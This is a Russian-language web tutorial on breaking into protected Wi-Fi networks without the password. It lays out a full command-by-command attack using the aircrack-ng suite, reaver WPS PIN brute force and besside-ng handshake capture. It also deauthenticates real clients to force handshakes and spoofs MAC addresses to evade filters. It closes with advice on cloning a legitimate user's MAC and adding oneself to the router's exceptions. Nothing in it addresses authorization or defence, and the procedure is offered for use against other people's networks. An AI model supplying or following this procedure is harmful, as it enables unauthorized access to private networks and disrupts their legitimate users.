Получаем доступ к защищенной Wi-Fi сети

В этом руководстве рассмотрим на практике, как получить доступ к защищенной (и не только) wi-fi сети без пароля.

Стартовый набор

Для эффективной работы нам понадобится несколько важных инструментов.

Wi-fi адаптер

Лучше всего подойдет ALFA AWUS036H, который можно приобрести на Ebay или в местном магазине. При покупке будьте внимательны и остерегайтесь подделок.

Дистрибутив Linux

Работы будут проводиться под линуксом, так что нам понадобится дистрибутив BackTrack 5 (на официальном сайте его уже нет, можно найти на просторах интернета) или Kali. Подойдет любой, так как в них «из коробки» имеется весь нужный набор инструментов.

Дальше, дистрибутив нужно записать на болванку или флешку (кому что удобней) – его будем использовать как live-cd.

Запуск и настройка системы

Если система не прогрузилась, напишите startx и подождите загрузки рабочего стола, а затем открывайте консоль (terminal).

Далее следует порядок утилит и команд, необходимых для работы:

airmon-ng – выведет на экран интерфейсы и соответствующие им чипсеты (ALFA AWUS036H использует чипсет Realtek RTL8187L). В нашем примере это будет wlan0.

ifconfig – позволяет увидеть устройства и мак адрес, который необходимо сменить.

ifconfig wlan0 down – выключает адаптер.

macchanger -r wlan0  - ключ -r – генерирует случайный мак адрес. Если нужно задать собственный, используйте ключ -m.

ifconfig wlan0 up – включает адаптер.

airmon-ng start wlan0 - переводит адаптер в режим монитора, это обязательно. Консоль покажет, что монитор запущен на интерфейсе mon0.

На этом подготовительная часть закончена.

airodump-ng mon0 - начнет сканирование доступных точек. Когда набралось достаточно, используйте ctrl+c, чтобы остановить утилиту.

Точки будут отличаться по типу шифрования:

OPN – открытые точки.

WEP – легко поддающиеся взлому.

WPA/WPA2 – самые распространенные, с некоторыми сложностями.

WPA/WPA2 c поддержкой WPS

Приступим непосредственно к взлому и начнем с интересного. Для начала рассмотрим взлом точек с WPS. Метод заключается в подборе пина, из 8 символов которого 4 передаются в открытом виде, время затрачиваемое на подбор комбинации 4 цифр не критично.

Как определить, поддерживает ли точка wps?

С помощью wash -i mon0. Однако будьте внимательны, эта утилита иногда работает некорректно и выдает либо не всё, либо лишнее.

Сканируем, находим точку и завершаем утилиту (ctrl+c).

Дальше в ход пойдет reaver.

reaver -i mon0 -b МАК:ТОЧКИ -c КАНАЛ -vv

Мак здесь – это bssid. Номер канала указывать не обязательно. Нужно запустить, следить за происходящим и если все хорошо через некоторое время получить заветный пароль от точки.

Хендшейки и брут

Если не вникать в теорию, для взлома wpa/wpa2 точки необходимо перехватить хендшейк, то есть нужно чтобы реальный пользователь успешно соединился с точкой, обменявшись ключами. Затем хендшейк предстоит расшифровать брутфорсом. В нашем случае по словарю.

Если подойдет любая точка, то шансы на успех увеличаться, а количество телодвижений уменьшится:

besside-ng mon0 – запустить и уйти. Эта программа будет ловить хендшейки от всего, чего можно, сама отключит клиента для получения нужных пакетов и сама же проведет атаку на сети с WEP шифрованием, записывая полученные результаты в файл besside.log (директория home). Там же будет находится файл wep.cap, который нужно скопировать на флешку.

Сети с пойманными хендшейками будут обозначаться и когда наловите всё что нужно - жмите ctrl+c чтобы остановить процесс.

Доступ к конкретной точке

Что делать, если нужна конкретная точка? Сидеть и искать.

airodump-ng --bssid МАК -w hui mon0 – включает запись в файл hui.cap

aireplay-ng --deauth 5 -a мак:точки -c мак:клиента wlan1 – стучится к клиенту, чтобы отключить его от точки.

Теперь нужно перейти в Windows, скачать Elcomsoft Wireless Security Auditor, словари, достать файл, который скинули на флешку и начать подбор.

Скорость достижения успеха зависит от видеокарты, процессора и качества словарей.

Что делать если

Поломали точку, но не можете соединиться? Или reaver отказывается соединяться с точкой?

Возможно, на точке стоит мак-фильтр. Нужно ловить маки пользователей айродампом и подменять на свой. Для смены мак-адреса адаптера через Windows используйте программу macchange. Cтоит помнить, что в одной сети не может быть двух пользователей с одним мак-адресом, это затруднит использование точки. Есть вероятность, что пароль на роутере такой же как на точке и ночью вы просто впишете в исключения свой мак-адрес.

Другие статьи по теме

Каталог полезных ссылок для взлома и Reverse Engineering

Самый понятный хакерский курс по взломам на Kali Linux

МЕРОПРИЯТИЯ

Комментарии

ВАКАНСИИ

Добавить вакансию

ЛУЧШИЕ СТАТЬИ ПО ТЕМЕ